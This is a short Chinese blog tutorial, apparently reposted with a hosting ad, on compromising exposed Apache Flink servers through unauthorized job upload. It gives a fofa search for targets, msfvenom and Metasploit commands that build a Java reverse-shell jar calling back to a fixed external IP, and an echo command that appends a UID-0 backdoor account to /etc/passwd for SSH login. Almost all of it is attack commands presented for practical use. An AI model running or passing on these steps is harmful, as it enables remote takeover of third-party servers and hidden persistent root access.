ApacheFlink未授权远程代码执行提权(实战)-创新互联
1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个
2、生成木马
下面展示一些内联代码片
。
msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar >rce.jar
msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar >rce.jar
3、打开msf 进行如下配置,并进行监听
下面展示一些内联代码片
。
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 47.103.79.70
set lport 4444
lport =>4444
run
3、上传刚才生成的木马,并执行
4、看到shell已经反弹回来
5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权限
6、通过如下代码强制写入账号及密码
echo "sql:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash">>/etc/passwd
7、再次查看passwd可看到账号已经写入成功,现在即可ssh登录了 密码为123
8、如果遇到登录失败,看参考上一篇docker提权的常见问题进行解决
链接: link
https://blog.csdn.net/u010025272/article/details/128176310?spm=1001.2014.3001.5502
你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧
本文题目:ApacheFlink未授权远程代码执行提权(实战)-创新互联
本文来源:http://myzitong.com/article/hojhg.html